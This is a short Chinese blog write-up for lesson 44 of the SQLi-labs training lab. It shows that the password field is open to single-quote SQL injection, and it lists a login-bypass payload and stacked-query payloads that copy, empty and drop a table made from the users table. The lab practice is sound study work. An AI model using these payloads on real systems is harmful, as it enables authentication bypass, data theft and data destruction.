Sqli labs less 44

1、在用户名使用万能密码测试，全部都登录失败。在密码字段使用万能密码测试，使用单引号和引号闭合时登录成功。说明用户名参数注入时存在过滤，密码字段存在单引号闭合的字符型注入。

Password：a' OR 1 = 1#

2.堆叠注入：参考上个less，在每次登陆时完成一步堆叠注入。

a' OR 1 = 1;CREATE TABLE WhiteMoon LIKE users;#
a' OR 1 = 1;INSERT INTO WhiteMoon SELECT * FROM users;#
a' OR 1 = 1;DELETE FROM WhiteMoon;#
a' OR 1 = 1;DROP TABLE WhiteMoon;#

posted @ 2021-09-15 15:19 Nuyoah_QQ 阅读(44) 评论(0) 收藏举报

刷新页面返回顶部

Nuyoah_QQ

Sqli labs less 44

公告